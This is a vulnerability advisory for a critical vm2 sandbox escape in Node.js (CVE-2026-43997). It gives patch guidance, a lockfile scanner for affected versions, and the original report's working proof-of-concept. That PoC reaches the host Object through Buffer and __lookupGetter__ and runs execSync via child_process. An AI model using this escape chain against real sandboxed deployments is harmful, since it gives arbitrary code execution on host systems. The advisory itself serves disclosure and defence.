10.0
CVE-2026-43997: vm2 Sandbox Escape Allows Malicious Code Execution
GHSA-47x8-96vw-5wg6
CVE-2026-43997
Summary
vm2, a JavaScript sandbox library for Node.js, has a vulnerability that allows an attacker to escape the sandbox and execute malicious code on the host system. This could lead to unauthorized access to and control of the system. To protect against this vulnerability, update vm2 to the fixed version, 3.11.0, which includes additional protections against sandbox escape.
What to do
- Update GitHub Actions vm2 to version 3.11.0.
- Update vm2 to version 3.11.0.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | GitHub Actions | vm2 | <= 3.10.5 (fix: upgrade to 3.11.0) |
| npm | – | vm2 | <= 3.10.5 (fix: upgrade to 3.11.0) |
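To act on the affected range listed above, the following added example (not code from the advisory or the vm2 project) scans a parsed npm lockfile for vm2 entries ordered before 3.11.0, covering both the flat `packages` map and the older nested `dependencies` tree. The sample lockfile and the package names `some-plugin` and `sandbox-alias` are constructed for illustration.

```javascript
// Added example (not from the advisory): flag vm2 installs in an npm lockfile.
const FIXED = [3, 11, 0]; // fixed release named on this page
// Conservative reading of "<= 3.10.5": anything ordered before 3.11.0,
// including 3.11.0 prereleases. Unparseable versions are flagged for review.
function isAffected(version) {
  const m = /^(\d+)\.(\d+)\.(\d+)(-.*)?/.exec(String(version));
  if (!m) return true;
  const parts = m.slice(1, 4).map(Number);
  for (let i = 0; i < 3; i++) {
    if (parts[i] !== FIXED[i]) return parts[i] < FIXED[i];
  }
  return m[4] !== undefined; // "3.11.0-rc.1" sorts before 3.11.0
}

function findAffectedVm2(lock) {
  const hits = [];
  const check = (path, name, version) => {
    if (name === 'vm2' && isAffected(version)) hits.push({ path, version });
  };
  if (lock.packages) {
    // lockfileVersion 2/3: flat map by install path; aliases keep the real name in meta.name.
    for (const [path, meta] of Object.entries(lock.packages)) {
      const dirName = path.split('node_modules/').pop();
      check(path, meta.name || dirName, meta.version);
    }
  } else {
    // lockfileVersion 1: nested "dependencies" tree.
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        const path = `${prefix}node_modules/${name}`;
        check(path, name, meta.version);
        walk(meta.dependencies, `${path}/`);
      }
    };
    walk(lock.dependencies, '');
  }
  return hits;
}

// Constructed sample lockfile; package names other than vm2 are hypothetical.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    'node_modules/vm2': { version: '3.10.5' },
    'node_modules/some-plugin/node_modules/vm2': { version: '3.11.0' },
    'node_modules/sandbox-alias': { name: 'vm2', version: '3.9.19' },
  },
};
console.log(findAffectedVm2(sampleLock));
```

To check a real project, pass `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` to `findAffectedVm2`.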
Original title
vm2 Access to Host Object Enables Sandbox Escape
Original description
### Summary
It is possible to obtain the host `Object`; https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.
### Details
There are various ways to use the host `Object` to escape the sandbox; one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`.
### PoC
```js
const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
const obj = {
  [sym]: (depth, opt, inspect) => {
    inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
  },
  valueOf: undefined,
  constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});
```
### Impact
Sandbox Escape -> RCE
ghsa CVSS3.1
10.0
Vulnerability type
CWE-94
Code Injection
Published: 7 May 2026 · Updated: 30 May 2026 · First seen: 7 May 2026